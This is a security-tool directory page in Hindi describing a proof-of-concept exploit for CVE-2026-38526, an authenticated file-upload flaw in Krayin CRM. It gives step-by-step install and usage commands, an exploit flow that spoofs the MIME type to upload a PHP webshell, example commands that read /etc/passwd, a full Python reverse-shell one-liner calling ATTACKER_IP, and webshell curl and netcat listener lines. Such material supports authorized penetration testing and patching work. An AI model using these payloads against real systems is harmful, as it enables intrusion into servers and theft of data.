Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PoC-CVE-2026-38526 — Automated exploit for Krayin CRM ≤ 2.2.x. | Kitploit
उपकरण/GitHubGitHub/b0nyo/poc-cve-2026-38526
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubb0nyo/poc-cve-2026-38526

PoC-CVE-2026-38526

Automated exploit for Krayin CRM ≤ 2.2.x.

रिपॉजिटरी देखें
1 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-38526 - Krayin CRM PHP Upload RCE

Krayin CRM ≤ 2.2.x के लिए स्वचालित एक्सप्लॉइट। यह स्क्रिप्ट TinyMCE एंडपॉइंट (/admin/tinymce/upload) में असीमित फ़ाइल अपलोड भेद्यता का शोषण करती है, image/jpeg का रूप धारण करके MIME-प्रकार सत्यापन को बायपास करती है, एक PHP वेबशेल अपलोड करती है, और वेब सर्वर विशेषाधिकारों के साथ मनमाने कमांड निष्पादित करती है।


भेद्यता विवरण

गुणमान
CVE IDCVE-2026-38526
प्रभावित सॉफ़्टवेयरKrayin CRM ≤ 2.2.x
भेद्यता प्रकारअसीमित फ़ाइल अपलोड → रिमोट कोड निष्पादन
प्रमाणीकरणआवश्यक (कोई भी मान्य व्यवस्थापक खाता)
एंडपॉइंटPOST /admin/tinymce/upload

पूर्वापेक्षाएँ

  • Python 3.7+
  • लक्षित Krayin CRM इंस्टेंस के लिए मान्य व्यवस्थापक क्रेडेंशियल्स
  • लक्षित एप्लिकेशन तक नेटवर्क पहुँच
  • requests लाइब्रेरी

इंस्टॉलेशन

root@kitploit:~
git clone https://github.com/b0nyo/CVE-2026-38526.git
cd CVE-2026-38526
pip3 install -r requirements.txt

उपयोग

root@kitploit:~
python3 CVE-2026-38526.py -i <TARGET_URL> -u <USERNAME> -p <PASSWORD> [-c <COMMAND>]

आर्ग्युमेंट्स

उदाहरण

root@kitploit:~
# Basic check
python3 CVE-2026-38526.py -i http://target.com -u [email protected] -p "AdminPassword123!"

# Custom command
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "cat /etc/passwd"

# Reverse shell
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"

एक्सप्लॉइट प्रवाह

  1. प्रमाणीकरण: लॉगिन पृष्ठ से CSRF टोकन निकालें, दिए गए क्रेडेंशियल्स से प्रमाणित करें
  2. सत्र सत्यापन: प्रमाणित डैशबोर्ड से नया CSRF टोकन निकालें
  3. वेबशेल अपलोड: नकली MIME-प्रकार के साथ PHP पेलोड को /admin/tinymce/upload पर अपलोड करें
  4. कमांड निष्पादन: वेबशेल GET पैरामीटर के माध्यम से मनमाने कमांड निष्पादित करें

नमूना आउटपुट

root@kitploit:~
[*] Target: http://target.com
[*] Username: [email protected]

[*] Authenticating...
[+] Authentication successful

[*] Uploading webshell...
[+] Webshell uploaded: http://target.com/storage/tinymce/abc123def456.php
[+] CVE-2026-38526 CONFIRMED - Remote Code Execution

[*] Executing: id
[*] Output:
────────────────────────────────────────────────────────────────────
uid=33(www-data) gid=33(www-data) groups=33(www-data)
────────────────────────────────────────────────────────────────────

[*] Manual execution (curl):
curl 'http://target.com/storage/tinymce/abc123def456.php?cmd=id'

सामान्य समस्याएँ

प्रमाणीकरण विफल: सत्यापित करें कि क्रेडेंशियल्स सही हैं और खाता लक्ष्य पर मौजूद है।

CSRF टोकन निष्कर्षण विफल: सुनिश्चित करें कि लक्ष्य कमजोर Krayin CRM चला रहा है और लॉगिन एंडपॉइंट सुलभ है।

रिवर्स शेल कनेक्ट नहीं हो रहा: सुनिश्चित करें कि आपका लिसनर चल रहा है (nc -lvnp <PORT>), फ़ायरवॉल नियम आउटबाउंड कनेक्शन की अनुमति देते हैं, और पेलोड में IP/पोर्ट सही हैं।


अस्वीकरण

यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। किसी भी लक्षित सिस्टम का परीक्षण करने से पहले उचित प्राधिकरण सुनिश्चित करने की पूरी ज़िम्मेदारी उपयोगकर्ताओं की है। इस टूल के दुरुपयोग या इससे होने वाली क्षति के लिए लेखक कोई दायित्व नहीं लेता है।


संदर्भ

  • TREXNEGRO Security Advisory - CVE-2026-38526
  • Krayin CRM GitHub
  • OWASP - Unrestricted File Upload

लेखक

b0nyo - PoC कार्यान्वयन

  • GitHub

TREXNEGRO - भेद्यता खोज

  • Security Advisories
टूल डाउनलोड करें
फ़्लैगविवरणउदाहरण
-iलक्षित URL (http:// के साथ या उसके बिना)http://target.com या target.com
-uव्यवस्थापक ईमेल/उपयोगकर्ता नाम[email protected]
-pव्यवस्थापक पासवर्डAdminPassword123!
-cनिष्पादित करने के लिए कमांड (डिफ़ॉल्ट: id)whoami